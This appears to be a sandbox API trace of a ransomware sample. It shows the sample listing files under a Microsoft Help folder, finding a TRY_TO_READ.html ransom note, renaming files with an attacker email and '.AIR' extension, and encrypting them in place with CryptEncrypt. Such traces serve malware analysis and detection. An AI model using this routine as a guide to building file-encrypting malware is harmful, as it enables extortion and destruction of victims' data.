	[0100.185] FindNextFileW (in: hFindFile=0x5da7b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x15f8e210, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x15f8e210, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1604c8f0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x158, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.MSACCESS.14.1033.hxn", cAlternateFileName="MSMSAC~1.HXN")) returned 1
	[0100.185] FindNextFileW (in: hFindFile=0x5da7b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x15f8e210, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x15f8e210, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1604c8f0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x170, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.MSACCESS.DEV.14.1033.hxn", cAlternateFileName="MSMSAC~2.HXN")) returned 1
	[0100.185] FindNextFileW (in: hFindFile=0x5da7b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xef377f10, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef377f10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef3ea330, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x146, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.MSOUC.14.1033.hxn", cAlternateFileName="MSMSOU~1.HXN")) returned 1
	[0100.186] FindNextFileW (in: hFindFile=0x5da7b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x1beeb370, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x1beeb370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1bf5d790, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x146, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.MSPUB.14.1033.hxn", cAlternateFileName="MSMSPU~1.HXN")) returned 1
	[0100.186] FindNextFileW (in: hFindFile=0x5da7b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x1beeb370, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x1beeb370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1bf5d790, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x15e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.MSPUB.DEV.14.1033.hxn", cAlternateFileName="MSMSPU~2.HXN")) returned 1
	[0100.186] FindNextFileW (in: hFindFile=0x5da7b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xef377f10, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef377f10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef3ea330, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x14c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.MSTORE.14.1033.hxn", cAlternateFileName="MSMSTO~1.HXN")) returned 1
	[0100.186] FindNextFileW (in: hFindFile=0x5da7b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xef377f10, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef377f10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef3ea330, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x13a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.OIS.14.1033.hxn", cAlternateFileName="MSOIS1~1.HXN")) returned 1
	[0100.186] FindNextFileW (in: hFindFile=0x5da7b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xc997810, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xc997810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc9e3ad0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x152, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.ONENOTE.14.1033.hxn", cAlternateFileName="MSONEN~1.HXN")) returned 1
	[0100.186] FindNextFileW (in: hFindFile=0x5da7b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x25328b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x25328b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2689510, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x152, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.OUTLOOK.14.1033.hxn", cAlternateFileName="MSOUTL~1.HXN")) returned 1
	[0100.186] FindNextFileW (in: hFindFile=0x5da7b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x25328b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x25328b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x26af670, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x16a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.OUTLOOK.DEV.14.1033.hxn", cAlternateFileName="MSOUTL~2.HXN")) returned 1
	[0100.186] FindNextFileW (in: hFindFile=0x5da7b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xf5fa06b0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf5fa06b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf5fec970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x158, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.POWERPNT.14.1033.hxn", cAlternateFileName="MSPOWE~1.HXN")) returned 1
	[0100.186] FindNextFileW (in: hFindFile=0x5da7b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xf5fa06b0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf5fa06b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf5fec970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x170, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.POWERPNT.DEV.14.1033.hxn", cAlternateFileName="MSPOWE~2.HXN")) returned 1
	[0100.186] FindNextFileW (in: hFindFile=0x5da7b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xef377f10, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef377f10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef3ea330, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x152, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.SETLANG.14.1033.hxn", cAlternateFileName="MSSETL~1.HXN")) returned 1
	[0100.186] FindNextFileW (in: hFindFile=0x5da7b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x523a6340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x523a6340, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x5269fec0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x146, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.VISIO.14.1033.hxn", cAlternateFileName="MSVISI~1.HXN")) returned 1
	[0100.186] FindNextFileW (in: hFindFile=0x5da7b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x523a6340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x523a6340, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x527122e0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x15e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.VISIO.DEV.14.1033.hxn", cAlternateFileName="MSVISI~3.HXN")) returned 1
	[0100.187] FindNextFileW (in: hFindFile=0x5da7b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x523a6340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x523a6340, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x52738440, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x188, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.VISIO.SHAPESHEET.14.1033.hxn", cAlternateFileName="MSVISI~4.HXN")) returned 1
	[0100.187] FindNextFileW (in: hFindFile=0x5da7b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x523a6340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x523a6340, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x52738440, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x15e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.VISIO_PRM.14.1033.hxn", cAlternateFileName="MSE1C9~1.HXN")) returned 1
	[0100.187] FindNextFileW (in: hFindFile=0x5da7b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x523a6340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x523a6340, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x527122e0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x15e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.VISIO_STD.14.1033.hxn", cAlternateFileName="MSVISI~2.HXN")) returned 1
	[0100.187] FindNextFileW (in: hFindFile=0x5da7b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xaf766ee0, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xaf766ee0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xaf7d9300, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x152, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.WINPROJ.14.1033.hxn", cAlternateFileName="MSWINP~1.HXN")) returned 1
	[0100.187] FindNextFileW (in: hFindFile=0x5da7b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xaf766ee0, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xaf766ee0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xaf7d9300, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x16a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.WINPROJ.DEV.14.1033.hxn", cAlternateFileName="MSWINP~2.HXN")) returned 1
	[0100.187] FindNextFileW (in: hFindFile=0x5da7b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x1e67e130, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x1e67e130, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1e6f0550, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x152, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.WINWORD.14.1033.hxn", cAlternateFileName="MSWINW~1.HXN")) returned 1
	[0100.187] FindNextFileW (in: hFindFile=0x5da7b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x1e67e130, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x1e67e130, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1e6f0550, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x16a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.WINWORD.DEV.14.1033.hxn", cAlternateFileName="MSWINW~2.HXN")) returned 1
	[0100.187] FindNextFileW (in: hFindFile=0x5da7b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xe80ff230, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0xe80ff230, ftLastAccessTime.dwHighDateTime=0x1d2dda1, ftLastWriteTime.dwLowDateTime=0xe8b8c220, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x21dc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nslist.hxl", cAlternateFileName="")) returned 1
	[0100.187] FindNextFileW (in: hFindFile=0x5da7b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xca7fee70, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xca7fee70, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca7fee70, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0100.187] FindNextFileW (in: hFindFile=0x5da7b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xca7fee70, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xca7fee70, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca7fee70, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0100.187] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0100.187] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0100.187] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\nslist.hxl", dwFileAttributes=0x80) returned 1
	[0100.188] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\nslist.hxl") returned 45
	[0100.188] GetProcessHeap () returned 0x540000
	[0100.188] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xc0) returned 0x5919d0
	[0100.188] lstrcpyW (in: lpString1=0x5919d0, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\nslist.hxl" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\nslist.hxl") returned="C:\\\\Users\\All Users\\Microsoft Help\\nslist.hxl"
	[0100.188] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\nslist.hxl", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\nslist.hxl.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Microsoft Help\\nslist.hxl.12781717671972518758.ex_parvis@aol.com.AIR"
	[0100.188] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\nslist.hxl" (normalized: "c:\\users\\all users\\microsoft help\\nslist.hxl"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\nslist.hxl.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\nslist.hxl.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0100.190] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\nslist.hxl.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\nslist.hxl.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c0
	[0100.190] GetProcessHeap () returned 0x540000
	[0100.190] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5919d0 | out: hHeap=0x540000) returned 1
	[0100.190] GetFileSizeEx (in: hFile=0x4c0, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=8668) returned 1
	[0100.190] SetFilePointer (in: hFile=0x4c0, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x21dc
	[0100.190] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0100.190] GetProcessHeap () returned 0x540000
	[0100.190] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0100.190] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0100.191] WriteFile (in: hFile=0x4c0, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0100.192] WriteFile (in: hFile=0x4c0, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0100.192] WriteFile (in: hFile=0x4c0, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0100.193] ReadFile (in: hFile=0x4c0, lpBuffer=0x605bb8, nNumberOfBytesToRead=0x21dc, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x605bb8*, lpNumberOfBytesRead=0x3a1f778*=0x21dc, lpOverlapped=0x0) returned 1
	[0100.193] SetFilePointer (in: hFile=0x4c0, lDistanceToMove=-8668, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0100.194] WriteFile (in: hFile=0x4c0, lpBuffer=0x607da0*, nNumberOfBytesToWrite=0x21dc, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x607da0*, lpNumberOfBytesWritten=0x3a1f778*=0x21dc, lpOverlapped=0x0) returned 1
	[0100.194] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0100.194] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0100.194] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", dwFileAttributes=0x80) returned 1
	[0100.194] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn") returned 61
	[0100.194] GetProcessHeap () returned 0x540000
	[0100.194] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xe0) returned 0x601bd0
	[0100.194] lstrcpyW (in: lpString1=0x601bd0, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn"
	[0100.194] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR"
	[0100.194] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.winword.dev.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.winword.dev.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0100.197] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.winword.dev.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c0
	[0100.197] GetProcessHeap () returned 0x540000
	[0100.197] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x601bd0 | out: hHeap=0x540000) returned 1
	[0100.197] GetFileSizeEx (in: hFile=0x4c0, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=362) returned 1
	[0100.197] SetFilePointer (in: hFile=0x4c0, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x16a
	[0100.197] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0100.197] GetProcessHeap () returned 0x540000
	[0100.197] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0100.197] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0100.197] WriteFile (in: hFile=0x4c0, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0100.198] WriteFile (in: hFile=0x4c0, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0100.198] WriteFile (in: hFile=0x4c0, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0100.198] ReadFile (in: hFile=0x4c0, lpBuffer=0x597dc8, nNumberOfBytesToRead=0x16a, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x597dc8*, lpNumberOfBytesRead=0x3a1f778*=0x16a, lpOverlapped=0x0) returned 1
	[0100.198] SetFilePointer (in: hFile=0x4c0, lDistanceToMove=-362, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0100.198] WriteFile (in: hFile=0x4c0, lpBuffer=0x56b448*, nNumberOfBytesToWrite=0x16a, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x56b448*, lpNumberOfBytesWritten=0x3a1f778*=0x16a, lpOverlapped=0x0) returned 1
	[0100.198] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0100.198] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0100.199] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINWORD.14.1033.hxn", dwFileAttributes=0x80) returned 1
	[0100.199] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINWORD.14.1033.hxn") returned 57
	[0100.199] GetProcessHeap () returned 0x540000
	[0100.199] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xd8) returned 0x5919d0
	[0100.199] lstrcpyW (in: lpString1=0x5919d0, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINWORD.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINWORD.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINWORD.14.1033.hxn"
	[0100.200] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINWORD.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINWORD.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR"
